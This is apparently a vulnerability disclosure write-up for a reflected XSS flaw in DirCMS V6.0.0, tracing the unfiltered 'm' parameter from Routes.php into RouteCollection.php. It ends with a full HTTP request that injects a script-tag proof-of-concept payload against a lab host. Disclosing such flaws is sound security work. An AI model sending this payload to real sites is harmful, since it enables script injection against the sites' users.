Skip to content

Latest commit

 

History

History
39 lines (27 loc) · 2.26 KB

DirCMS_V6.0.0_XSS_vulnerability.md

File metadata and controls

39 lines (27 loc) · 2.26 KB

DirCMS V6.0.0 has an XSS vulnerability in the foreground

Vulnerability description

DirCMS content management system is a powerful yet compact content management system based on PHP+Mysql architecture. DirCMS codes are all open source, which is convenient for users to develop or customize again; and adopts simple template label technology to make template creation easier. Under normal circumstances, it only takes half a day to build an enterprise website with DirCMS, which truly realizes the simplicity of functions. , practical, powerful and flexible. Can be widely used in the construction of various portal stations, download stations, enterprise stations, studios and other sites. DirCMS has accumulated tens of thousands of user groups since its release until the beginning of 2011, and has gained a good reputation. There is an XSS vulnerability in the foreground of DirCMS V6.0.0. Program download address: https://gitee.com/greenlaw/dircms6 Vulnerability URL /dircms/Core/Config/Routes.php parameter filtering is not strict, there is an XSS vulnerability.

Vulnerability analysis

In line 74 of the file /dircms/Core/Config/Routes.php, the parameters submitted by the client are received and saved in the variable m

image-20230314105549563

Then call the setDefaultMethod function in the /dircms/System/Router/RouteCollection.php file for processing

image-20230314105925996

In this method, the data input by the user is not filtered and output as it is, and there is an XSS vulnerability.

Vulnerability verification

GET /admin.php?c=module_search&dir=22222&m=show_indexqdspk<script>alert(1)</script>dx3bt HTTP/1.1
Host: 10.10.10.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh
Referer: http://10.10.10.1/admin.php?c=home&m=home
Sec-Gpc: 1
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Connection: close


image-20230314105819675

image-20230314105833263